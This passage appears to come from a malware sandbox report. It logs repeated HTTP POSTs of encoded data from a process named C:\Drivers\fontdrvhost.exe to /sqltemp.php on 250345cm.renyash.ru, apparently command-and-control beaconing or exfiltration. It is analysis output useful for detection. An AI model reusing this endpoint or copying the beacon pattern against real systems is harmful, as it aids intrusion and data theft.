cfL4;desc="?proto=TCP&rtt=4061&min_rtt=1750&rtt_var=5278&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=72134&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50100	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:31.182378054 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:31.527422905 CET	1012	OUT	Data Raw: 56 55 5f 5d 54 5c 54 5d 58 56 52 59 56 5e 59 56 5b 5e 54 5a 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VU_]T\T]XVRYV^YV[^TZU]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3<)#<>'.',)%U =*9(-<7?+)@%Y(.:&Y.,Y-
Jan 1, 2025 14:53:31.648525953 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:31.950557947 CET	803	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1w%2BdMdNhIMVu8zAhHbY68n1OOylLNO49WTdSw2DsZvd%2FfKx15HFIspNzCJ65%2BCTzjCrWQ7qvpgEfraJ%2BqsyXMGIOIB1Eim%2B6U3s6bODnUBKmLIurv5iWFAMlgDtqqzKuTiGY2lkx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fefc7ab442d1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4339&min_rtt=2291&rtt_var=4956&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=78154&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a Data Ascii: 42W\X
Jan 1, 2025 14:53:32.086225986 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50107	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:32.212224007 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:32.558749914 CET	1012	OUT	Data Raw: 56 57 5f 52 54 5e 54 52 58 56 52 59 56 5b 59 55 5b 5e 54 5c 55 5d 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VW_RT^TRXVRYV[YU[^T\U]PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y'=#/=Y3X7B81U4-??U*=4 "'[+(9A2Y$.&Y.,Y-)
Jan 1, 2025 14:53:32.689398050 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:32.958375931 CET	814	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IE3qXV%2BghPi2cey3%2FfwPrgB2%2Bs8%2FVE9%2BfdT1WwtPZLOFv0CK%2ByqY0Gl1LQo4hbnxfNfommFyiYxU4THX9atlabnx48iALT%2FQRdEsXm2wroCD%2BDp5zvk76ekpf5Df5NebHa6wp0nw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff030d617d16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4674&min_rtt=1911&rtt_var=6244&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=60780&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50113	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:33.090452909 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:33.449290991 CET	1012	OUT	Data Raw: 56 5e 5a 53 54 5a 54 5d 58 56 52 59 56 5c 59 57 5b 5d 54 5e 55 5d 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V^ZSTZT]XVRYV\YW[]T^U]PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y$" ?&$=;C;:: -X+;W>X$Y!20<-D1<;S.*&Y.,Y-5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50117	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:33.519196033 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:33.871119976 CET	1852	OUT	Data Raw: 56 56 5f 53 54 5b 54 56 58 56 52 59 56 5d 59 57 5b 5f 54 50 55 5e 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VV_ST[TVXVRYV]YW[_TPU^PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._'<5[ <&$, [#(9V=$!"7((=&/V.*&Y.,Y-1
Jan 1, 2025 14:53:33.964046955 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:34.151750088 CET	956	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BdgDrpDvUwIR24Zils2C9FTJVVYmzKv1HKqfqEyYg%2F8MAmiKcwaw2oPu%2FclRDSCJRXKLrwex2ABfq6hlu4Ybi8g0nUmaXRRomgzePloiM6l2Z1F4Gi7gw9NbV12gUcKz%2FnnDcjVJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff0aff4e41e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3226&min_rtt=2062&rtt_var=3102&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=128329&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 09 2a 2e 2e 56 26 1c 3b 00 2b 03 2c 0c 26 3e 00 13 2b 06 3a 15 24 00 2c 04 2a 3a 23 10 22 3c 3d 13 31 06 05 03 34 3e 24 07 27 1e 2b 59 05 1c 23 1a 22 2f 02 5e 3d 3e 3b 15 31 11 2d 59 24 2e 28 1b 3f 28 01 0f 22 3b 06 03 24 3e 38 1e 2a 14 2c 1d 24 3c 23 19 2d 59 2d 10 30 00 2c 54 00 11 26 55 25 21 16 58 23 09 3b 03 35 31 25 5e 26 0a 21 0b 24 2c 01 53 21 3a 32 16 26 21 24 03 36 0a 26 5e 31 3b 0f 13 20 03 27 51 2a 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&..V&;+,&>+:$,:#"<=14>$'+Y#"/^=>;1-Y$.(?(";$>8,$<#-Y-0,T&U%!X#;51%^&!$,S!:2&!$6&^1; 'Q%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50120	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:33.645781994 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:33.996253014 CET	1012	OUT	Data Raw: 56 51 5a 50 54 50 51 52 58 56 52 59 56 5c 59 57 5b 59 54 5f 55 5d 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQZPTPQRXVRYV\YW[YT_U]PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'!X4?)$'@/)=S Z(:<* #'<]!1/,*&Y.,Y-5
Jan 1, 2025 14:53:34.098443985 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:34.360364914 CET	801	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wc4gr8aYO7Mvcwyl%2FdH9oIfN2bHE3mvUcB9oTWUImnHi2njiWJGuQqPhBlJHXyUbBV0RPres2WTKI3GgRLzJhCsXfJaOnOkN2Dq6ENtfklGVYKtRP0ttNneJlfJIktfBRsquHMyu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff0bdb8d437e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8577&min_rtt=2493&rtt_var=13103&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=28533&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50126	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:34.481085062 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:34.839864969 CET	1012	OUT	Data Raw: 56 50 5f 55 54 5f 54 55 58 56 52 59 56 5d 59 5e 5b 52 54 59 55 55 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_UT_TUXVRYV]Y^[RTYUUPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3?-\ %^3X;C,7[?()(*.$\ 2(+@2.&Y.,Y-1
Jan 1, 2025 14:53:34.944031000 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:35.199927092 CET	810	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0b5ClDH4o7vtoqq3zzxrplJWWrMD3sp%2Bf3d1zq6bE8hzWf99UiKDPDCr%2Bubh6eeNfdUC2bq%2FaIhv6ZY8wa5zmusTp%2BJHQoLpfM3Nk4iEYzaEn%2BpRhkMrw%2FFWcJACvJH8GeSWZIWP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff1119fd4261-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3816&min_rtt=1615&rtt_var=5009&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=75930&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50132	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:35.322820902 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:35.668483019 CET	1012	OUT	Data Raw: 53 53 5f 53 54 59 54 51 58 56 52 59 56 50 59 50 5b 5a 54 5d 55 5f 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SS_STYTQXVRYVPYP[ZT]U_PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/"?)^3?;)"#>8Z('=<\71+Y<%&,?S,:&Y.,Y-
Jan 1, 2025 14:53:35.767045975 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:35.946017981 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xfo9X%2Bnu5oLRBDnlZGw8KcUiqDY9B%2BrV39%2FG39mIkW8F0%2B2jhNLSiwqQ2VSE8Y8xiImg37ww%2BAgxqyieXg60p4XzBL9wFSCDoo7%2FfiqPtTZ7LjWCqaLDmOGoyu%2FNG3M2F9Es%2BQXT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff1648587287-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8351&min_rtt=2046&rtt_var=13378&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27815&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50138	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:36.079335928 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:36.433725119 CET	1012	OUT	Data Raw: 53 52 5f 57 54 5e 54 5d 58 56 52 59 56 50 59 56 5b 5a 54 5b 55 54 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SR_WT^T]XVRYVPYV[ZT[UTP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z'>#?]0=7B/)9V!=/)#S= [!27()1/;S:&Y.,Y-
Jan 1, 2025 14:53:36.524014950 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:36.697197914 CET	803	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6nRMoB8kP8hVPlN1Hsygdpw9iY01uQLDbH1%2BtATbAjzLe2GjqceP5I3VMcNnuyY1FdZuwrzPC8%2BzUUYVUFqBkBORcWoyBFClh17hWFoLSytQg2Lsaf5orJA8oj6NYjbpxhFBhIvR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff1aff57423b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2799&min_rtt=1725&rtt_var=2796&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=141431&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50139	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:36.824229002 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:37.183700085 CET	1012	OUT	Data Raw: 56 51 5a 50 54 59 54 53 58 56 52 59 56 58 59 56 5b 59 54 59 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQZPTYTSXVRYVXYV[YTYUUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^'%Y ,=_$.#,:>#.8Z(#(.?4 <6&/9*&Y.,Y-%
Jan 1, 2025 14:53:37.291965008 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:37.543256044 CET	805	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akXNpMCIqqfLtLc66D75k7fJykdFOusH8z9D5E%2FJIHQ13RSrAuycAo6yJaFmI81J%2F%2FNMWC6R7Juzwt590KseJLseOH7XF8BzyrhAUC0Gj7uMXXledWrli8HcFn6IdsajslMNZgxJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff1fcd740c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9694&min_rtt=4455&rtt_var=12149&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=31485&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50140	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:37.668204069 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:38.027390957 CET	1012	OUT	Data Raw: 53 57 5f 55 51 5c 54 57 58 56 52 59 56 51 59 57 5b 5c 54 5e 55 54 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SW_UQ\TWXVRYVQYW[\T^UTP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y$/7/.'$/4.<[()7V)$!2<8"1/7-&Y.,Y-
Jan 1, 2025 14:53:38.160312891 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:38.423739910 CET	814	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4%2FJo%2BcPn6ImzgzqV8%2B8aYd1LzdOlD9%2BVgeHM%2FZdDXhtYsw6Ena4vWuKDKxsd8JYsXMHpHNEGwDbrhyJsDyKxdlCgXaMojgRrjxIjeleU%2FEYikJp%2BwU4eTQ6%2BJjXJhKxknnLRmYX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2ff25387d9e16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4039&min_rtt=1974&rtt_var=4871&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=78927&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50141	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:38.564229965 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
